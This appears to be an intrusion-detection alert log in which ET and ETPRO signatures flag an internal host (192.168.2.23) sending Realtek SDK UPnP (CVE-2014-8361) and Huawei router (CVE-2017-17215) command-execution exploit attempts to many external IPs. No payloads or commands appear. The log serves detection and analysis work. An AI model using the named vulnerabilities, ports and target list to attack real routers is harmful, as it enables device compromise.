                                      07/20/24-23:01:04.965535TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614498052869192.168.2.23103.179.244.2
                                      07/20/24-23:01:44.389834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5453252869192.168.2.2323.3.191.75
                                      07/20/24-23:00:57.221145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5688637215192.168.2.2317.113.7.103
                                      07/20/24-23:01:00.634165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3728437215192.168.2.23197.35.57.182
                                      07/20/24-23:01:09.817737TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25294252869192.168.2.2344.188.193.15
                                      07/20/24-23:01:44.559176TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5101652869192.168.2.23123.97.7.185
                                      07/20/24-23:01:43.903732TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5947652869192.168.2.2350.123.92.219
                                      07/20/24-23:01:42.430595TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614618252869192.168.2.23163.49.61.251
                                      07/20/24-23:01:44.161942TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615562052869192.168.2.23213.162.26.171
                                      07/20/24-23:01:42.290838TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614335652869192.168.2.23123.147.61.106
                                      07/20/24-23:01:14.126869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4075037215192.168.2.2341.199.61.192
                                      07/20/24-23:01:31.979565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5093237215192.168.2.23123.35.251.224
                                      07/20/24-23:01:32.060731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6003637215192.168.2.23137.86.119.85
                                      07/20/24-23:01:49.228425TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4345452869192.168.2.23219.217.14.87
                                      07/20/24-23:01:25.275555TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614615052869192.168.2.23136.18.44.19
                                      07/20/24-23:01:41.417573TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5278852869192.168.2.23140.117.188.131
                                      07/20/24-23:01:44.795218TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24858252869192.168.2.23121.163.119.125
                                      07/20/24-23:01:46.329268TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5058852869192.168.2.23116.175.162.178
                                      07/20/24-23:02:19.406496TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614839852869192.168.2.23190.157.219.101
                                      07/20/24-23:01:03.252602TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3507252869192.168.2.23205.45.42.138
                                      07/20/24-23:01:42.530468TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5978652869192.168.2.23221.195.248.226
                                      07/20/24-23:01:24.898476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4572437215192.168.2.2373.38.236.100
                                      07/20/24-23:01:58.892811TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5341652869192.168.2.23105.169.76.44
                                      07/20/24-23:00:57.221220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5819637215192.168.2.23197.77.131.53
                                      07/20/24-23:01:42.602712TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25316652869192.168.2.23190.125.30.210
                                      07/20/24-23:01:52.877228TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25686252869192.168.2.23185.104.180.12
                                      07/20/24-23:01:49.170008TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25065652869192.168.2.23179.176.134.213
                                      07/20/24-23:01:11.633481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5345837215192.168.2.23157.205.78.42
                                      07/20/24-23:01:21.915268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4271437215192.168.2.23157.75.221.250
                                      07/20/24-23:01:31.317668TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24831652869192.168.2.23177.181.36.106
                                      07/20/24-23:01:54.277123TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615539052869192.168.2.23222.178.130.155
                                      07/20/24-23:01:46.629075TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3618652869192.168.2.23169.80.181.136
                                      07/20/24-23:01:11.816504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3288837215192.168.2.2320.16.236.13
                                      07/20/24-23:01:27.658221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4745237215192.168.2.23197.38.231.207
                                      07/20/24-23:01:44.825081TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615916252869192.168.2.2379.217.40.139
                                      07/20/24-23:01:02.432131TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3356052869192.168.2.238.98.158.174
                                      07/20/24-23:01:45.094539TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6054452869192.168.2.2369.102.162.227
                                      07/20/24-23:01:24.943244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4763837215192.168.2.23140.101.155.227
                                      07/20/24-23:01:49.631749TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615419452869192.168.2.2373.161.205.249
                                      07/20/24-23:01:03.175286TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5062052869192.168.2.23152.136.236.137
                                      07/20/24-23:02:04.208558TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3893852869192.168.2.23202.29.220.93
                                      07/20/24-23:01:46.109136TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615980052869192.168.2.23111.211.116.144
                                      07/20/24-23:02:01.320866TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5875452869192.168.2.23202.174.156.78
                                      07/20/24-23:01:04.082384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4449437215192.168.2.2341.28.46.127
                                      07/20/24-23:01:31.312311TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4275652869192.168.2.23144.247.247.76
                                      07/20/24-23:01:49.660516TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614831852869192.168.2.23135.160.162.200
                                      07/20/24-23:01:51.197215TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615298252869192.168.2.23174.95.107.188
                                      07/20/24-23:01:31.976649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5728637215192.168.2.2341.134.23.85
                                      07/20/24-23:01:40.343151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3983837215192.168.2.23197.236.217.25
                                      07/20/24-23:01:24.885895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5141237215192.168.2.2346.35.149.243
                                      07/20/24-23:01:49.228425TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5558652869192.168.2.23216.13.41.148
                                      07/20/24-23:01:45.079349TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4840852869192.168.2.23179.206.84.130
                                      07/20/24-23:01:08.640831TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23583452869192.168.2.23104.55.221.40
                                      07/20/24-23:01:55.944701TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615910252869192.168.2.23191.189.100.30
                                      07/20/24-23:01:04.094795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4210437215192.168.2.2341.185.138.78
                                      07/20/24-23:01:02.146232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4525237215192.168.2.2341.155.25.219
                                      07/20/24-23:01:44.340422TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5600052869192.168.2.23102.51.73.237
                                      07/20/24-23:01:42.111275TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614862252869192.168.2.23159.247.88.93
                                      07/20/24-23:01:51.400635TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3511052869192.168.2.2343.224.149.155
                                      07/20/24-23:01:42.115778TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24613852869192.168.2.23216.159.149.17
                                      07/20/24-23:01:02.127340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4057037215192.168.2.23197.165.85.196
                                      07/20/24-23:01:27.664887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287637215192.168.2.23197.123.66.12
                                      07/20/24-23:02:00.668349TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25392452869192.168.2.2383.28.127.148
                                      07/20/24-23:01:02.127340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5496837215192.168.2.2358.225.246.95
                                      07/20/24-23:01:08.606848TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24719452869192.168.2.2360.99.150.220
                                      07/20/24-23:01:51.919746TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5329452869192.168.2.23128.17.186.62
                                      07/20/24-23:01:01.387027TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615697452869192.168.2.23153.15.211.214
                                      07/20/24-23:01:42.891313TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5132052869192.168.2.23163.173.48.45
                                      07/20/24-23:01:34.053062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5324837215192.168.2.2341.4.72.224
                                      07/20/24-23:01:42.774505TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5384452869192.168.2.2377.77.166.196
                                      07/20/24-23:01:25.940871TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616019252869192.168.2.2397.255.56.23
                                      07/20/24-23:01:55.125263TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5575852869192.168.2.2327.236.237.70
                                      07/20/24-23:02:20.374641TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613862052869192.168.2.23138.173.140.141
                                      07/20/24-23:01:00.634292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5164637215192.168.2.23197.50.46.65
                                      07/20/24-23:01:43.455918TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3693252869192.168.2.2340.122.120.5
                                      07/20/24-23:01:44.520226TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25156252869192.168.2.23114.151.113.249
                                      07/20/24-23:01:20.110860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4053237215192.168.2.23157.87.180.92
                                      07/20/24-23:01:27.651332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5771437215192.168.2.23197.53.165.17
                                      07/20/24-23:01:43.810783TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4608052869192.168.2.23180.71.140.26
                                      07/20/24-23:00:59.191389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5039837215192.168.2.23157.174.150.26
                                      07/20/24-23:01:08.667513TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23713252869192.168.2.23134.167.171.74
                                      07/20/24-23:01:43.107634TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614597052869192.168.2.2360.118.116.115
                                      07/20/24-23:01:43.697010TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24526252869192.168.2.23111.193.202.8
                                      07/20/24-23:01:56.999569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3568252869192.168.2.2362.146.159.96
                                      07/20/24-23:01:56.510714TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5902652869192.168.2.23112.218.81.136
                                      07/20/24-23:01:40.331150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4964037215192.168.2.2341.212.160.245
                                      07/20/24-23:02:04.133789TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614413852869192.168.2.23190.159.104.180
                                      07/20/24-23:01:40.320408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3571837215192.168.2.23197.154.95.35
                                      07/20/24-23:01:02.479085TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3345052869192.168.2.23104.55.221.40
                                      07/20/24-23:01:25.549014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6031252869192.168.2.23155.220.6.134
                                      07/20/24-23:01:07.036064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4724237215192.168.2.2341.85.228.41
                                      07/20/24-23:01:41.648203TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24444252869192.168.2.23223.203.126.251
                                      07/20/24-23:01:46.109943TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25506252869192.168.2.2391.202.203.164
                                      07/20/24-23:01:13.976791TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5712252869192.168.2.23136.56.196.147
                                      07/20/24-23:02:02.751507TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5357652869192.168.2.23167.60.51.106
                                      07/20/24-23:01:42.729311TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24975852869192.168.2.23130.96.13.171
                                      07/20/24-23:01:45.458332TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5199052869192.168.2.2358.56.54.197
                                      07/20/24-23:01:24.889164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869037215192.168.2.23157.128.212.188
                                      07/20/24-23:01:41.947663TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3343452869192.168.2.23218.234.180.136
                                      07/20/24-23:01:43.328791TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614980052869192.168.2.2341.199.13.54
                                      07/20/24-23:01:44.859405TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25532852869192.168.2.2375.163.230.218
                                      07/20/24-23:01:55.384732TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3907252869192.168.2.2360.14.147.228
                                      07/20/24-23:01:47.562957TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3725252869192.168.2.2347.13.214.247
                                      07/20/24-23:01:53.354788TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24096252869192.168.2.2389.150.205.193
                                      07/20/24-23:01:59.377547TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25276452869192.168.2.2367.74.143.214
                                      07/20/24-23:01:04.178669TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4432652869192.168.2.23109.115.27.6
                                      07/20/24-23:01:25.187391TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615066852869192.168.2.23123.249.201.235
                                      07/20/24-23:01:44.439012TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614884452869192.168.2.23108.225.154.233
                                      07/20/24-23:01:04.118165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3356237215192.168.2.23157.254.221.242
                                      07/20/24-23:01:24.944299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3742237215192.168.2.23157.61.104.107
                                      07/20/24-23:01:52.161851TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615017852869192.168.2.23194.242.148.126
                                      07/20/24-23:01:53.059915TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4783252869192.168.2.2319.90.99.238
                                      07/20/24-23:01:57.762774TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615825052869192.168.2.2360.220.21.170
                                      07/20/24-23:01:04.114673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3556237215192.168.2.2341.54.147.121
                                      07/20/24-23:01:02.690149TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5500252869192.168.2.23144.0.5.154
                                      07/20/24-23:01:50.863888TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615235252869192.168.2.23131.254.60.151
                                      07/20/24-23:01:04.039129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5276237215192.168.2.23173.164.252.237
                                      07/20/24-23:01:49.743796TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4664852869192.168.2.23177.220.208.210
                                      07/20/24-23:01:20.591702TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3592652869192.168.2.23191.208.79.121
                                      07/20/24-23:01:42.702732TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4967452869192.168.2.2380.70.75.159
                                      07/20/24-23:01:48.386032TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5459452869192.168.2.2327.248.134.22
                                      07/20/24-23:01:53.357099TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5350452869192.168.2.2348.97.254.151
                                      07/20/24-23:01:47.931222TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5699452869192.168.2.23114.55.77.0
                                      07/20/24-23:01:01.285840TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5226852869192.168.2.23207.223.182.162
                                      07/20/24-23:01:14.146543TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614548852869192.168.2.23178.124.248.177
                                      07/20/24-23:01:24.867858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5275837215192.168.2.23112.90.251.196
                                      07/20/24-23:01:45.331813TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24564852869192.168.2.2360.240.72.8
                                      07/20/24-23:01:41.305474TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615096652869192.168.2.2339.181.131.100
                                      07/20/24-23:01:08.598416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5773452869192.168.2.23183.49.28.217
                                      07/20/24-23:01:04.050503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3801237215192.168.2.23197.88.18.128
                                      07/20/24-23:01:08.652877TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4738052869192.168.2.23120.98.109.98
                                      07/20/24-23:01:11.820979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4919437215192.168.2.23108.25.203.240
                                      07/20/24-23:01:53.524729TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4711452869192.168.2.2381.22.157.142
                                      07/20/24-23:01:34.045143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5103237215192.168.2.23157.12.69.99
                                      07/20/24-23:01:32.076593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4536437215192.168.2.23197.76.87.111
                                      07/20/24-23:01:02.048113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842237215192.168.2.2341.227.71.109
                                      07/20/24-23:01:00.633744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5728837215192.168.2.2341.191.248.36
                                      07/20/24-23:01:46.241196TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23928252869192.168.2.23220.111.117.206
                                      07/20/24-23:01:12.807274TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3761252869192.168.2.2382.106.122.253
                                      07/20/24-23:01:57.388537TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24425252869192.168.2.2367.104.194.85
                                      07/20/24-23:01:44.944699TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615390052869192.168.2.23110.40.238.120
                                      07/20/24-23:01:25.715288TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5574452869192.168.2.2397.193.3.141
                                      07/20/24-23:01:45.034156TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615895452869192.168.2.23132.191.84.86
                                      07/20/24-23:01:41.318733TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614149452869192.168.2.238.157.181.46
                                      07/20/24-23:01:57.169212TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5614852869192.168.2.2317.24.227.79
                                      07/20/24-23:01:14.090830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5992437215192.168.2.23197.128.170.53
                                      07/20/24-23:01:44.788688TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5184652869192.168.2.2319.242.116.26
                                      07/20/24-23:01:46.032975TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3528852869192.168.2.23166.191.111.147
                                      07/20/24-23:01:40.334452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5967437215192.168.2.23197.22.225.39
                                      07/20/24-23:01:31.331820TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23935452869192.168.2.239.241.118.240
                                      07/20/24-23:01:41.370228TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614586852869192.168.2.23111.186.32.47
                                      07/20/24-23:01:42.175191TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3460252869192.168.2.2392.1.18.107
                                      07/20/24-23:01:24.739204TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4731052869192.168.2.23109.17.111.246
                                      07/20/24-23:01:49.703914TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4141052869192.168.2.23126.214.32.228
                                      07/20/24-23:01:49.075905TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5449852869192.168.2.23125.106.198.203
                                      07/20/24-23:01:44.124551TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5698852869192.168.2.23112.138.84.14
                                      07/20/24-23:00:57.222029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895037215192.168.2.23197.71.207.159
                                      07/20/24-23:01:08.578727TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3599652869192.168.2.2354.235.197.43
                                      07/20/24-23:01:10.691725TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615268852869192.168.2.23166.63.2.220
                                      07/20/24-23:01:21.139934TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25908252869192.168.2.2385.106.41.174
                                      07/20/24-23:01:47.410892TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5437252869192.168.2.2313.59.59.107
                                      07/20/24-23:01:46.450130TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25813852869192.168.2.23187.157.152.232
                                      07/20/24-23:02:11.743968TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615286852869192.168.2.23184.146.237.12
                                      07/20/24-23:02:04.592319TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613721252869192.168.2.23185.12.96.106
                                      07/20/24-23:01:01.292992TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613371252869192.168.2.23184.60.97.199
                                      07/20/24-23:00:59.157444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5284237215192.168.2.2341.132.51.195
                                      07/20/24-23:01:40.290003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5555237215192.168.2.23197.221.226.157
                                      07/20/24-23:01:24.862410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5572437215192.168.2.2334.93.53.66
                                      07/20/24-23:01:46.844704TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23740652869192.168.2.23161.217.163.253
                                      07/20/24-23:01:59.154601TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23759852869192.168.2.23177.72.81.243
                                      07/20/24-23:01:24.862410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4492037215192.168.2.23157.206.47.33
                                      07/20/24-23:01:04.802341TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613509052869192.168.2.2399.2.133.89
                                      07/20/24-23:01:48.888934TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24764452869192.168.2.23130.131.47.204
                                      07/20/24-23:01:45.485100TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615375652869192.168.2.2362.42.246.19
                                      07/20/24-23:00:59.154067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4745037215192.168.2.23143.28.80.1
                                      07/20/24-23:01:20.161614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5570237215192.168.2.23157.73.42.54
                                      07/20/24-23:01:53.697003TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3462452869192.168.2.23192.45.244.106
